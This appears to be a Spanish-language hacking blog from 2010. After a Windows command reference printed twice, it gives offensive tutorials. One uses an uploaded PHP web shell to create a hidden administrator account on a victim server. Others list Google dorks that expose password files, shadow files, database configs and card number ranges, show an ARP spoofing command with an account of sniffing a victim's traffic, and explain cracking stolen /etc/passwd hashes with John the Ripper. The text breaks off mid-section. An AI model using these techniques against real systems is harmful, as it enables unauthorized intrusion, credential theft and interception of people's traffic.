dimarts, 21 de desembre del 2010

Comandos utiles Windows NT

Windows NT (comandos editados por 3rr0r)

Archivos:

dir [ruta][archivo]: lista los archivos y subdirectorios existentes en la ruta, la opción de archivo admite comodines (*,?):

/A:[atributo] muestra los ficheros con los atributos especificados:

D: directorios
H: archivos ocultos
S: archivos de sistema.
R: archivos de solo lectura.
A: archivos para archivar

-: este prefijo niega el atributo.

 /B: formato simple de presentación de datos.

 /O:[orden]: muestra los archivos ordenados según:

N: nombre.

E: extensión

S: tamaño

D: fecha y hora

G: agrupa los directorios primeros

-: invierte el orden alfabético.

/w ó /D: formatos anchos de presentación de archivos.

/P: hace una pausa después de cada pantalla completa

move (confirmación) [ruta-origen/nombre-archivo] [ruta-destino]: mueve ficheros de un origen a un destino. En el caso de directorios la opción los cambia de nombre.

/Y: no pide confirmación de la operación.

/-Y: pide confirmación de la operación.

copy [archivo] [destino]: copia un archivo a un origen a un destino.

/Y: no pide confirmación de la operación.

/-Y: pide confirmación de la operación.

Para concatenar fichero se puede usar la orden copy; el formato es copy archivo-receptor archivo1+archivo2+.....

del (opciones)[archivo]: borra archivos

/P pide confirmación de la eliminación

/F fuerza la eliminación de archivos de solo lectura.

/S elimina los archivos especificados en todos los subdirectorios.

/Q no pide confirmación.

/A:[atributo] elimina archivos en función a los atributos.

xcopy [origen] [destino] (opciones) copy ficheros y directorios desde un origen a un destino. El número de opciones es muy alto

mkdir [nombre]: crea un directorio.

rmdir (opciones)[directorio]: borra un directorio.

/S borra ficheros y subdirectorios situados por debajo del directorio.

/Q no pide confirmación de borrado.

cd [directorio]: cambia de directorio, si no se le pasa ningún parámetro nos pasa a nuestro directorio.

rename [origen][destino]: cambia el nombre del fichero

attrib [atributos][archivo](opciones) : cambia los atributos de un archivo o archivos

atributos: son los señalados anteriormente y se preceden de un signo – para

eliminar el atributo y de un signo + para activarlo

/S procesa los archivos que coincida en todas las carpetas.

/D procesa carpetas.

Búsquedas:
Find (opción) “cadena” [ruta-archivo]: busca una cadena de texto en uno o varios archivos

/V muestra todas las líneas que no tienen la cadena.

/C muestra solamente el número de líneas que contienen la cadena

/N muestra el número de línea que corresponde a cada línea.

/I omite mayúsculas/minúsculas en la cadena.

Findstr: busca cadenas en los archivos al igual que find, pero las posibilidades de formateo son mayores

Procesos:

Los comandos de procesos se realizan en modo gráfico, no hay versión en modo texto.

Herramientas de disco:

recover ruta-archivo] permite recuperar información de archivos dañados.

Format [unidad] (opciones): da formato de archivos a una unidad o volumen, los sistemas de archivos soportados son FAT, FAT32, UDF y NTFS. Las opciones son numerosas, las principales son:

/Q formato rápido.

/FS:sistema-archivos: especifica el sistema de archivos.

/V:etiqueta: establece la etiqueta de volumen.

/F: establece el formato de disco en disquetes de 3 1/2

Subst [unidad-virtual] [ruta-física]: asigna una unidad a una ruta especifica.

/D elimina el enlace.

Tree [unidad-ruta](opciones): muestra en forma de árbol la estructura de directorios:

/F incluye en la muestra los archivos existentes

/A usa texto ASCII para dibujar el árbol de directorios.

Vol: muestra la etiqueta de un volumen.

Paginadores:

more (opciones)[archivo]: muestra el contenido de uno o varios archivos en pantalla página a página, la separación de archivos se realiza por un espacio en blanco.

/E activa loas acciones avanzadas

/C limpia la pantalla antes de mostrar la siguiente

/P expande los caracteres de avance de línea.

/S comparta varias líneas consecutivas en blanco en una

+n comienza a mostrar el contenido del fichero en la línea n

Si las opciones extendidas están activas, las posibilidades en la línea de de espera (--Más--) son:

P n muestra las siguientes n líneas.

S n saltarse las siguientes n líneas

F mostrar el siguiente archivo

Q salir

Type [archivo]: parecido a more pero menos completo.

Ayuda.

help [comando]: ofrece en pantalla una explicación del comando.
help: resumen de comandos

att: 3rr0r

Comandos utiles Windows NT

Windows NT (comandos editador por 3rr0r)

Archivos:

dir [ruta][archivo]: lista los archivos y subdirectorios existentes en la ruta, la opción de archivo admite comodines (*,?):

/A:[atributo] muestra los ficheros con los atributos especificados:

D: directorios
H: archivos ocultos
S: archivos de sistema.
R: archivos de solo lectura.
A: archivos para archivar

-: este prefijo niega el atributo.

 /B: formato simple de presentación de datos.

 /O:[orden]: muestra los archivos ordenados según:

N: nombre.

E: extensión

S: tamaño

D: fecha y hora

G: agrupa los directorios primeros

-: invierte el orden alfabético.

/w ó /D: formatos anchos de presentación de archivos.

/P: hace una pausa después de cada pantalla completa

move (confirmación) [ruta-origen/nombre-archivo] [ruta-destino]: mueve ficheros de un origen a un destino. En el caso de directorios la opción los cambia de nombre.

/Y: no pide confirmación de la operación.

/-Y: pide confirmación de la operación.

copy [archivo] [destino]: copia un archivo a un origen a un destino.

/Y: no pide confirmación de la operación.

/-Y: pide confirmación de la operación.

Para concatenar fichero se puede usar la orden copy; el formato es copy archivo-receptor archivo1+archivo2+.....

del (opciones)[archivo]: borra archivos

/P pide confirmación de la eliminación

/F fuerza la eliminación de archivos de solo lectura.

/S elimina los archivos especificados en todos los subdirectorios.

/Q no pide confirmación.

/A:[atributo] elimina archivos en función a los atributos.

xcopy [origen] [destino] (opciones) copy ficheros y directorios desde un origen a un destino. El número de opciones es muy alto

mkdir [nombre]: crea un directorio.

rmdir (opciones)[directorio]: borra un directorio.

/S borra ficheros y subdirectorios situados por debajo del directorio.

/Q no pide confirmación de borrado.

cd [directorio]: cambia de directorio, si no se le pasa ningún parámetro nos pasa a nuestro directorio.

rename [origen][destino]: cambia el nombre del fichero

attrib [atributos][archivo](opciones) : cambia los atributos de un archivo o archivos

atributos: son los señalados anteriormente y se preceden de un signo – para

eliminar el atributo y de un signo + para activarlo

/S procesa los archivos que coincida en todas las carpetas.

/D procesa carpetas.

Búsquedas:
Find (opción) “cadena” [ruta-archivo]: busca una cadena de texto en uno o varios archivos

/V muestra todas las líneas que no tienen la cadena.

/C muestra solamente el número de líneas que contienen la cadena

/N muestra el número de línea que corresponde a cada línea.

/I omite mayúsculas/minúsculas en la cadena.

Findstr: busca cadenas en los archivos al igual que find, pero las posibilidades de formateo son mayores

Procesos:

Los comandos de procesos se realizan en modo gráfico, no hay versión en modo texto.

Herramientas de disco:

recover ruta-archivo] permite recuperar información de archivos dañados.

Format [unidad] (opciones): da formato de archivos a una unidad o volumen, los sistemas de archivos soportados son FAT, FAT32, UDF y NTFS. Las opciones son numerosas, las principales son:

/Q formato rápido.

/FS:sistema-archivos: especifica el sistema de archivos.

/V:etiqueta: establece la etiqueta de volumen.

/F: establece el formato de disco en disquetes de 3 1/2

Subst [unidad-virtual] [ruta-física]: asigna una unidad a una ruta especifica.

/D elimina el enlace.

Tree [unidad-ruta](opciones): muestra en forma de árbol la estructura de directorios:

/F incluye en la muestra los archivos existentes

/A usa texto ASCII para dibujar el árbol de directorios.

Vol: muestra la etiqueta de un volumen.

Paginadores:

more (opciones)[archivo]: muestra el contenido de uno o varios archivos en pantalla página a página, la separación de archivos se realiza por un espacio en blanco.

/E activa loas acciones avanzadas

/C limpia la pantalla antes de mostrar la siguiente

/P expande los caracteres de avance de línea.

/S comparta varias líneas consecutivas en blanco en una

+n comienza a mostrar el contenido del fichero en la línea n

Si las opciones extendidas están activas, las posibilidades en la línea de de espera (--Más--) son:

P n muestra las siguientes n líneas.

S n saltarse las siguientes n líneas

F mostrar el siguiente archivo

Q salir

Type [archivo]: parecido a more pero menos completo.

Ayuda.

help [comando]: ofrece en pantalla una explicación del comando.
help: resumen de comandos

att: 3rr0r

Roteando Windows con shell en PHP

#############################
Tutorial Roteo de Windows by 3rr0r
#############################

1- Shell en php subida en web
2- Vamos a la DIR de la shell que anteriormente subimos.
3- Nos aparecera una pantalla negra.. por defecto ya esta configurada.
4- Nos dirigimos a la opcion inferior de la pantalla CMD

*Esto seria como una CMD normal i corriente de Windows. Podemos ejecutar comandos
para añadir i modificar usuarios, direcciones, permisos, etc.

################################
Añadiendo USER con default settings
################################

*En la linia de Comando introduciremos el siguiente codigo

--------------------------------------------------------------
Net User (nombre del user que querais) /add
-The command completed successfully.
--------------------------------------------------------------
Os aparecera un mnsj. que dirá lo siguiente más abajo:

-The command completed successfully.

#############################
Saber el nombre del Grupo Root
#############################

Ejecutaremos el comando:

-------------------------------
Net user administrator
-The command completed successfully.
-------------------------------

Abajo de todo nos aparecera el nomber del Grupo.
En mi caso:

User name                    Administrator
Full Name
Comment                      Built-in account for administering the computer/domain
User's comment
Country code                 000 (System Default)
Account active               No
Account expires              Never

Password last set            14/07/2009 5:55:45
Password expires             Never
Password changeable          14/07/2009 5:55:45
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   14/07/2009 5:53:58

Logon hours allowed          All

Local Group Memberships      *Administrators       *HomeUsers
Global Group memberships     *None
The command completed successfully.

La parte que nos interesa es la que dice lo siguiente:

Local Group Memberships      *Administrators       *HomeUsers

#######################
Dar permisos root a USER
#######################

Dependiendo de lo que nos ponga en 'Local Group Memberships' ejecutaremos el
siguiente comando:

--------------------------------------------------------
net localgroup administrators USER /add
-The command completed successfully.
--------------------------------------------------------
Donde 'administrators' = El nombre que nos dio Local Group Memberships
i 'USER' es el nombre que introdujimos en el primer comando para añadir
usuario.

Ahora ya tenemos un usuario con permisos ROOT (admin) en ese Windows.
Apartir de aqui ya podeis ejecutar el comando que querais dependiendo de vuestro
objetivo y finalidad.


Att: 3rr0r

dilluns, 1 de novembre del 2010

Dorks Parte II
























                 -COMIENZO-
                  /en google/

intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl: passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"




Se imaginaran q son estos Grin:


Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

Directorios y contraseñas al descubierto:


"parent directory " /appz/ -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml
-opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html
-htm -php -shtml -opendivx -md5 -md5sums

En estas busquedas solo estoy cambiando el nombre
luego de "parent directory " ,cambienlo por lo que
quieran y obtendran distintos resultados.


Intenten con estas busquedas:

?intitle:index.of? mp3

Solo hay q poner le nombre del cantante o cancion

Ejemplo: ?intitle:index.of? mp3 Metallica

inurl:microsoft filetype:iso

Pueden cambiar la busqueda a lo que quieran, ejemplo:
Microsoft a Linux , iso a rar ....

"# -FrontPage-" inurl:service.pwd
Contraseñas de Frontpage Cheesy

"AutoCreate=TRUE password=*"
Contraseñas de "Website Access Analyzer", un programa
japones q crea stadisticas web.

"http://*:*@www" dominio

Contraseñas, solo substituye "dominio" por el dominio
q busques sin el .com .net o lo q sea.

Ejemplo:
"http://*:*@www" micronosoft or
"http://*:*@www"micronosoft

Otro modo es escribiendo:
"http://bob:bob@www"

"sets mode: +k"
Esta busqueda muestra contraseñas de los canales de
IRC en los logs.

allinurl: admin mdb
Bases de datos Grin

allinurl:auth_user_file.txt
Archivo de contraseñas de DCForum's y DCShop(carrito
de compras). Este archivo contiene muchas contraseñas
crackeables, nombres de usuarios y emails.

intitle:"Index of" config.php
Estos archivos nomarlmente contienen el usuarios,dir y
contraseña de las bases de datos.Tendras
administracion total de la DB.

eggdrop filetype:user user
Nombres de usuario y contraseñas en canales de IRC.

intitle:index.of.etc
Esta busqueda te mostrara la pagina principal de la
carpeta etc/ donde se pueden encontrar muchos archivos
importantes y contraseñas, no siempre se encontraran
contraseñas pero puedes encontrar muchas cosas
interesantes aca.

filetype:bak inurl:"htaccess|passwd|shadow|htusers"
Esto mostrara muchos archivos de backups(respaldos)
creados por programas o por el administrador.

Si necesitas buscar algun numero serial para algun
programa,digamos windows XP profesional.

"Windows XP Professional" 94FBR

El 94FBR es devido a q este pedaso de codigo se
encuentra en muchos de los CD-keys de windows, asi q
esto disminuira la cantidad de paginas pornos q
intentan engañarte.

¿Para qué tomarse la molestia de arremeter contra un
sitio web en busca de vulnerabilidades que hayan
pasado inadvertidas cuando se puede entrar con toda
comodidad por la puerta delantera?

Estas intrusiones se pueden realizar gracias a que
existen bases de datos con conexión a Internet. Como
las herramientas de gestión de bases de datos utilizan
plantillas (templates) estandarizadas para presentar
los datos en la Red, al ingresar ciertas frases
específicas el usuario muchas veces puede acceder
directamente a las páginas que utilizan esas
plantillas. Por ejemplo, al ingresar la frase "Select
a database to view" (seleccionar una base de datos
para ver) -una fase habitual en la interfaz de base de
datos FileMaker Pro- en el Google, se obtuvieron
alrededor de 200 links, de los cuales casi todos
conducían a bases de datos creadas con FileMaker a las
que se puede acceder online.

Por ejemplo si usas lo siguiente:
2 - Buscar
"Index of /admin" + passwd
o
"Index of /wwwboard" + passwd
o
"Index of /backup" + mdb
Veras grandes resultados.!

Si escribes lo que aparece abajo en el buscador de
google podras acceder a base de datos, contraseñas,
webs con bugs, hasta a numeros de tarjeta de credito.
Practica un poco y prueba los distintos comandos,
luego crea tus propias lineas para buscar. Un buen
sitio de información de como hackear con google es
http://johnny.ihackstuff.com/ está en inglés, pero no
llegarás a nada si no visitas páginas como esta

filetype:htpasswd htpasswd
intitle:"Index of" ".htpasswd" -intitle:"dist" -apache
-htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurl: passlist.txt (para encontrar listas de
passwords)
intitle:"Index of..etc" passwd
intitle:admin intitle:login
"Incorrect syntax near" (SQL script error)
intitle:"the page cannot be found" inetmgr (debilidad
en IIS4)
intitle:index.of ws_ftp.ini
"Supplied arguments is not a valid PostgreSQL result"
(possible debilidad SQL)
_vti_pvt password intitle:index.of (Frontpage)
inurl:backup intitle:index.of inurl:admin
"Index of /backup"
index.of.password
index.of.winnt

inurl:"auth_user_file.txt"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
Index of /" +.htaccess
Index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurl: passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"Index of" passwd
intitle:"Index of" people.1st
intitle:"Index of" pwd.db
intitle:"Index of" etc/shadow
intitle:"Index of" spwd
intitle:"Index of" master.passwd
intitle:"Index of" htpasswd
intitle:"Index of" members OR accounts
intitle:"Index of" user_carts OR user _cart

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
test-cgi
wwwboard.pl
www-sql
pwd.dat
ws_ftp.log


Revelar datos con Google no parece nada complicado,
especialmente para todos los sistemas mal
configurados... una búsqueda específica permite
mostrar directorios poniendo en un índice y
accediendo, la contraseña, los archivos, los caminos,
etc, etc...

Las Puntas de la búsqueda


las entradas de la búsqueda comúnes debajo de le dará
una idea... por ejemplo si usted quiere buscar el un
índice de "root"

En la caja de la búsqueda puesta exactamente en como
usted véalo debajo
source jhonyyhackstuff.com
Ejemplo 1:

allintitle: "index of/root"

Resultad:


lo que revela es 2,510 páginas que usted puede ver y
posiblemente se encuentre su testamento...

Ejemplo 2:

inurl:"auth_user_file.txt"


Este da un resultado de 414 posibles archivos para
acceder

INVESTIGUE LOS CAMINOS.......

*************************************

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurl: passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."


top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart



~|por 3rr0r|~

diumenge, 26 de setembre del 2010

ARP Spoofing Ilustrado

 El ARP Spoofing es una de las muchas variaciones del Spoof que aprovecha las vulnerabilidades del TCP/IP. Esta es una tecnica muy interesante y que seguramente nos va a ser util en mas de una ocasion. La teoria de esta tecnica es muy simple, lo que no lo es tanto es conocer el funcionamiento del protocolo ARP para comprender que es lo que estamos
 haciendo; por eso primero empezaremos con una breve y clara (espero..) explicacion del protocolo ARP y luego pasaremos a ver la tecnica del ARP Spoofing en si. Espero que disfruten de la lectura de este texto y les sirva como motivacion para investigar mas sobre el TCP/IP y todas las cosas interesantes y
 divertidas que podemos hacer con el.. ;)

     1.     Protocolo ARP. Como todos saben el TCP/IP es lo que se llama una "suite" de protocolos en el cual se encuentra el ARP(Address Resolution Protocol) entre otros.
 En el mundo TCP/IP nos identificamos con las direcciones IP(ej. 192.168.0.1),
 pero en una red LAN del tipo ethernet o token ring nos vamos a identificar con la direccion de hardware(ej. 00:E0:7D:77:4E:55) que cada placa de red
 posee; se usa este esquema de identificacion ya que por el mismo cable de
 la red pueden pasar distintos tipos de protocolos y una direccion IP solo
 tiene sentido en la suite TCP/IP.
 Si por ejemplo queremos establecer una conexion con un host de la red, lo
 que va a hacer el protocolo ARP es fijarse la direccion IP del host y
 encargarse de conseguirnos la direccion de hardware.
 Conexiones dial-up tipicas como las que hacemos a traves de la linea
 telefonica no necesitan usar ARP, ya que no hay en juego ninguna placa de
 red y por lo tanto direcciones de hardware que resolver. Si estamos usando Linux y tenemos configurada una placa de red en nuestra
 PC, con el siguiente comando podremos ver su direccion de hardware:

[root@ezkracho /]# ifconfig eth0

 eth0      Link encap:Ethernet  HWaddr 00:E0:7D:77:4E:55
           inet addr:192.168.0.1  Bcast:192.168.0.255  Mask:255.255.255.0
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:100
           Interrupt:5 Base address:0xbc00

 La direccion de hardware es grabada en la placa de red por el fabricante y
 es unica; cada direccion de hardware es de 48 bits al contrario de las
 direcciones IP que son de 32 bits.
    
 Ahora que ya sabemos basicamente que es lo que hace ARP vamos a verlo un
 poco mas en detalle, pero sin complicarnos demasiado.

 Supongamos que armamos una peque~a red con unos amigos y queremos hacer un
 telnet a la computadora de uno de ellos que tiene de host el nombre
 "ezkracho".
 Antes que nada nuestro cliente de telnet va a convertir el nombre ezkracho
 en una direccion IP de 32 bits, esto lo puede hacer buscando en el archivo
 /etc/hosts o en un servidor DNS que hayamos instalado.
 Una vez que tenemos la direccion IP del host ezkracho el cliente de telnet
 le va a decir al TCP que se encargue de establecer una conexion con esa
 direccion de IP; aqui el TCP va a enviar un datagrama IP solicitando una
 conexion al host ezkracho.
 En nuestro ejemplo estamos en una red local comun por lo cual el datagrama
 IP puede ir directamente hacia ese host, pero en el caso de que quisieramos
 telnetear a un host en una red remota nuestro datagrama IP se rutearia
 directamente hacia la salida predeterminada de la red, como por ejemplo un
 router y de ahi seguiria hasta el proximo salto hasta llegar a destino.
 Como habiamos explicado en una red LAN nos debemos identificar con la
 direccion de hardware, por lo que ARP va a convertir nuestra direccion IP de
 32 bits en nuestra direccion de hardware de 48 bits.
 Luego ARP va a enviar un pedido o lo que se llama un "ARP request" al
 broadcast, osea a cada host conectado en nuestra red, en el ARP request va
 incluido la direccion IP del host ezkracho y lo que hace es preguntar "si
 sos el due~o de esta direccion IP contestame con tu direccion de hardware".
 El host ezkracho va a recibir este broadcast con el ARP request preguntando
 por el y le va a contestar, esta respuesta se llama "ARP reply" y por
 supuesto que en ella va incluida su direccion de hardware.
 Una vez que se recibe el ARP reply  con la direccion de hardware finalmente
 vamos a poder terminar de enviar el datagrama IP al host ezkracho para
 entablar la conexion. Y todo esto gracias a ARP :)

 Muy bien, ahora que ya comprendemos mejor el funcionamiento de ARP vamos a
 explicar que es lo que se conoce como "ARP Cache".

 Para hacer mas eficiente el trabajo de resolver cual es la direccion de
 hardware de un host cada vez que se la necesita averiguar, existe el ARP
 Cache. Cada vez que algun host resuelve una direccion de hardware de otro
 host, todos los demas guardan una copia en el cache para despues no tener
 que volver a hacer ese mismo trabajo.
 Cada direccion de hardware que entra al ARP Cache es guardada por unos 20
 minutos(segun el OS), luego de ello se borra y si se la necesita se la tiene
 que volver a pedir a menos que ya otro host la haya pedido por lo cual vuelve
 a ingresar al cache y durara 20 minutos mas.

 En Linux tenemos el comando "arp" que nos sirve para manipular el arp cache
 de nuestro sistema. Si queremos ver el cache actual tenemos que hacer:

 [root@ezkracho /]# arp -a

 ezkracho (192.168.0.1) at 00:E0:7D:77:4E:55
 powertech (192.168.0.3) at 00:00:E8:57:82:6B

 La opcion "arp -a" nos muestra todas las entradas que hay en nuestro cache,
 como vemos primero aparece el host, luego la direccion IP y luego la direccion
 de hardware. Tenemos otras opciones del comando arp que tambien nos pueden
 ser muy utiles, por ejemplo la opcion "arp -d" que nos permite borrar
 cualquier entrada del cache pero esto solo puede ser hecho por el root. Hay
 otras opciones interesantes que las pueden investigar poniendo "man arp" en
 la consola.

 Hay muchas otras cosas que se pueden explicar sobre el protocolo ARP, pero
 al fin de este texto que es explicar el ARP Spoofing con esto nos alcanza.



     2.     ARP Spoofing.


 Llegamos a lo divertido! a esta altura los que estuvieron prestando atencion
 ya deben tener una idea de que se trata esto del ARP Spoofing, pero como
 siempre hay algunos resagados vamos a explicarlo un poco.

 Supongamos que yo le envio a un host victima un paquete con la direccion de
 hardware de mi placa de red pero con otra direccion IP de un host de la red,
 lo que va a suceder es que el host victima va a guardar esa informacion en
 su ARP Cache y a partir de ese momento va a creer que nosotros somos otro
 host de la red, porque cuando quiera enviarle algo al host que suplantamos
 va a buscar la direcion IP en su cache y va a enviar todo a la direccion de
 hardware que tenga asignada que por supuesto es la nuestra.

 Esta tecnica como ya lo dije antes es muy simple y los diferentes usos que
 se le pueda dar solo depende de nuestra imaginacion. Como anecdota, algo en
 lo que nos fue muy util esta tecnica fue cuando estabamos en una LAN en una
 reunion con gente de la scene Argentina y necesitabamos sniffear a una de
 las computadoras de la red, el problema era que en la LAN no habian hubs
 porque toda la interconexion era a traves de un switch por lo que el
 trafico de la red no pasaba por nosotros y simplemente no podiamos ponernos
 en modo promiscuo y comenzar a capturar paquetes. La solucion encontrada fue
 muy simple, le enviamos un paquete a nuestra victima con nuestra direccion
 de hardware pero con la direccion IP del gateway que nos daba salida a
 Internet, luego creamos un alias de la direccion IP del gateway pero en
 nuestra ethernet y luego lo forwardeamos al verdadero gateway. En si nuestra
 victima, que por cierto son unos chicos que se creen muy bromistas, estuvieron
 saliendo a Internet sin darse cuenta que primero pasaban por nosotros y que
 los estuvimos sniffeando toda la noche. Quiero aprovechar para saludar a
 dr_fdisk^ y airlink que nos dieron una gran mano esa noche ;)

 Hay muchos programas que sirven para hacer todo lo comentado pero les
 recomiendo el arp-fun de Ulandron(www.undersec.com) que es muy bueno y facil
 de usar.

 Veamos un ejemplo practico con el arp-fun:

 [root@ezkracho /]# arp-fun -i eth0 -s 192.168.0.10 -a 0A:0B:0C:0D:0E:0F //
 -d 192.168.0.3 -m 00:00:E8:57:82:6B -v -c 2
 Attempting to send 2 packets
 Source ip: 192.168.0.10
 Dest   ip: 192.168.0.3
 Everything fine, 'til now. Let's build the packet
 Looks nice, huh:
 00      0000 57e8 6b82 0b0a 0d0c 0f0e 0608 0100
 10      0008 0406 0200 0b0a 0d0c 0f0e a8c0 0a00
 20      0000 57e8 6b82 a8c0 0300
 Sent packet 1, waiting 0 seconds
 Sent packet 2, waiting 0 seconds

 Analizemos este ejemplo, aqui vemos que enviamos al host powertech que tiene
 la direccion IP 192.168.0.3 y la direccion de hardware 00:00:E8:57:82:6B,
 dos paquetes diciendole que somos el host cenobyte que tiene la direccion IP
 192.168.0.10 y la direccion de hardware 0A:0B:0C:0D:0E:0F, el host cenobyte
 es el gateway a Internet de toda la LAN mediante una conexion dial-up,
 pero la direccion de hardware que pusimos para este host es inventada y no
 existe por lo que a partir de ahora nuestro amigo Powertech se va a quedar
 sin salida a Internet :P

 Este ejemplo de ARP Spoofing en particular no tiene mucha utilidad pero
 quien dice que no podemos divertirnos un poco...

 Las opciones del arp-fun como muchos otros ejemplos de ARP Spoofing los
 pueden encontrar en el README de este programa.

~Kosak0 Team~

Analisis del John The Ripper 1.6

Los passwords en un sistema UNIX generalmente se encuentran en el archivo
 /etc/passwd, estos estan no muy bien encriptados, hasta no hace mucho a los
 administradores no les importaba que ese archivo sea leido por personas
 ajenas al sistema ya que crackearlos era algo casi imposible, hasta ahora
 la unica manera de crackear estos passwords es encriptando palabras de
 igual forma como lo hace el sistema e ir comparandolas hasta dar con la
 palabra buscada, como soluci¢n a esto en algunos sistemas ocultan los
 passwords en el archivo /etc/shadow generalmente, este archivo no tiene
 permiso de lectura para todo mundo como el /etc/passwd y por eso mismo es
 mas dificil conseguirlo, ojo, dificil pero no imposible, han surgido varios
 programas para crackear estos passwords, pero sin duda el mas eficiente es
 el  John  The Ripper,  ya que  es el  mas rapido hasta  ahora,  muchos
 administradores desconocen las existencia de este tipo de programas, lo que
 es un gravisimo error ya que al ignorar que puede hacer este programa son
 un blanco facil para un ataque del mismo, ya que hay bastante gente que
 pregunta sobre el uso del john the ripper aqui analizaremos un poco algunas
 de las posibilidades que este nos brinda.
                           
                                Passwd  
                                ÍÍÍÍÍÍ
                      
 Ok, ya tenemos el /etc/passwd, ¨como? bueno ese es otro tema X-D
 Que es lo primero que hacemos, pues primero vemos que sea as¡

       root:XpAxNqj.2Wh6.:0:0:root:/root:/bin/bash

 si en el lugar donde esta "XpAxNqj.2Wh6." vemos "x" o "*" entonces los
 passwords estan ocultos, eso lo veremos luego pero por ahora sigamos.

 Al ver que si est n los passwords yo recomiendo usar primero la opci¢n
 single asi

john -single passwd

 donde passwd es el archivo donde se encuentran los passwords pero puede ser
 cualquier otro nombre, asi que cuando veas passwd me estoy refiriendo al
 archivo donde se encuentran estos passwords y shadow donde estan los passes
 en caso de que esten ocultos.

 La opci¢n single personalmente es la opci¢n que saca mas passwords, ya que
 esta usa la informaci¢n que sale en el passwd sobre ese login, muchas veces,
 bueno, much¡simas veces ponen de passwords (hey anota el dato XD) el mismo
 login, o el nombre, o el apellido, etc, por ejemplo:

rhantos:RKxhLEYIi7b9o:150:2000:Roberto Hantos:/home/rhantos:/bin/csh

 donde el password encriptado es roberto, en modo single este password sale
 en mucho menos de un segundo, mas adelante le mostrare algunas cosas sobre
 esto.

                             Listas de Palabras      
                             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ      
              
 Esto es muy importante si quieres crackear bastantes passwords, aunque de
 seguro no sacaras tantos passwords como en modo single, pero si es una muy
 buena opci¢n, se usa asi:

john -w:passwords.lst passwd

 aqui  estoy  usando  la lista de  palabras que  trae el john,  aqui
 podemos usar una opci¢n llamada rules, la cual a cada palabra le pone
 variaciones, como sufijos y prefijos, esta opci¢n hace que el tiempo en
 terminar sea mucho mayor que sin rules, y personalmente he sacado pocos
 passwords con esta opci¢n pero si salen

john -w:passwords.lst passwd -rules

                                Incremental      
                                ÍÍÍÍÍÍÍÍÍÍÍ         

 Sin duda, el modo incremental es una muy buena opci¢n, ya que si no
 existiera esta opcion tuvieramos que crear listas de palabras del tipo
 aaaaaaa hasta zzzzzzz, lo que ocupa mucha memoria en el DD, ademas de
 que si vamos a incluir may£sculas y min£sculas seria peor, las opciones
 en modo incremental son las siguientes:

alpha: Genera plabras con letras solamente, osea 26 letras
digits: Genera plabras con numeros solamente, desde el 0 hasta el 9
all: Genera plabras con letras, numeros y caracteres especiales, en total
son 90 caracteres, osea se pueden imaginar lo que tardar¡a en terminar
lanman: Es como el del l0phtcrack, nunca lo he usado.

 las opciones son...

john -i:alpha passwd

 No la he visto terminar, en alpha va probando todas las palabras que se
 puedan crear hasta 8 caracteres

john -i:digits passwd

 Esta si, con un promedio de 24500 c/s mi pc claro, un pentium 233 MHz MMX
 con 32 MB de RAM un password termina en 2 horas y pico, no recuerdo bien,
 pero se descubren bastantes, mucha gente pone su numero de c‚dula de
 password que aqui en Venezuela es exactamente 8 n£meros, a menos que sea
 c‚dula de viejo que son 7.

john -i:all passwd

 Hay mucha gente que se obcesiona con un password de algun root y creen que
 ajuro lo tiene que conseguir, a ellos les digo que no se obsecionen pero
 si funciona, eso tambien depende del tipo de password y de la paciencia que
 tengas, por ejemplo una vez puse a crackear un password de root, y a los
 9 dias y 3 horas el password habia sido crackeado, restale importancia, y
 solo lo pones a trabajar cuando no estes usando el computador, a menos que
 tengas linux ya que no hay problema, esto lo digo pq si usas windows y
 estas haciendo otras tareas con el y ademas crackeando el pass te va a
 ir muy lento, el password que descubr¡ era de este estilo "1446igua"
 (sin comillas  claro   claro que si el  password  hubiera sido algo
 como ",4*V4x5B" seria casi imposible crackear, quiz s el "casi" este
 de mas

                                Shadow  
                                ÍÍÍÍÍÍ  

